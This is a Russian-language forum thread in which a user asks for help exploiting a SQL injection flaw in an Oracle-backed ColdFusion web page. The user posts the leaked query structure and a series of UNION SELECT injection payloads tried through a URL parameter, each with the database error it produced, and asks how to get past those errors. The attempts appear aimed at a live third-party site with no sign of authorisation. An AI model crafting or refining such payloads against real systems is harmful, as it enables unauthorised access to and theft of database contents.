Sql inj в oracl

[m2infect]

Всем доброго дня/вечера/ночи!
Адрес.
/new/index.cfm?page=651&cl=12'
Отображается запрос, который должен выполниться.

SELECT
c.clientss_id, c.clientss_name, nc.news_clientss_inf, TO_CHAR(nc.news_clientss_date, 'DD.MM.YY') news_date1, nc.news_clientss_inform, nc.news_clientss_id
FROM
ANY.NEWS_CLIENTSS nc, ANY.clientss c
where
c.clientss_id=nc.clientss_id and c.clientss_id=33'
ORDER BY
nc.news_clientss_date DESC


Data Source = "CF-WEBDB"

Структура запроса
SELECT ....... FROM ........ where ............. ORDER BY
я так понял, нужно преобразовать в такой вид...
SELECT ....... FROM ........ where ............. union select
что и дописываю
33+union+select+1,2,3,4,5,6+from+nc--
таблица или представление пользователя не существует

0+union+select+1,2,3,4,5,6+from+clients_name--
таблица или представление пользователя не существует
33+union+select+c.clientss_id,+c.clientss_name,+nc.news_clientss_inf,+TO_CHAR(nc.news_clientss_date,%20'DD.MM.YY')+news_date1,+nc.news_clientss_inform,+nc.news_clientss_id%20+from+nc--
отсутствует правая скобка

Читал что в оракле проблема с вложенными запросами.
Пробывал множество вариантов, и если честно - встал в тупик.

О иньк. в оракле мало что полезного нашел.
Что можно еще попробывать?
Буду очень благодарен, за ссылки/подсказки.

С уважение.







Добавлено в [time]1154435732[/time]
Извените. Отпостил не в тот раздел. Конец рабочего дня, даёт о себе знать. :unsure:

 

[m2infect]

Вот еще пару интересных запросов.

1+union+select+1,2,3,4,7,6,7+from+ANY.clientss%20c--
Пишет: в блоке запроса неверное число столбцов результата.
Если добавить/убрать столбцы - результат ош. не меняется. Ну это понятно почему.

1+union+select+1,2,3,4,7,"6"+from+ANY.clientss+c--
"6": недопустимый идентификатор
пишу
1+union+select+1,2,3,4,7,6+from+ANY.clientss+c--
в ответ
"NC"."NEWS_CLIENTSS_DATE": недопустимый идентификатор
как так получилось? :fie:
1+union+select+1,2,3,4,7,6+from+ANY.clientss+where+'1'='1'--
неверен реляционный оператор
:help: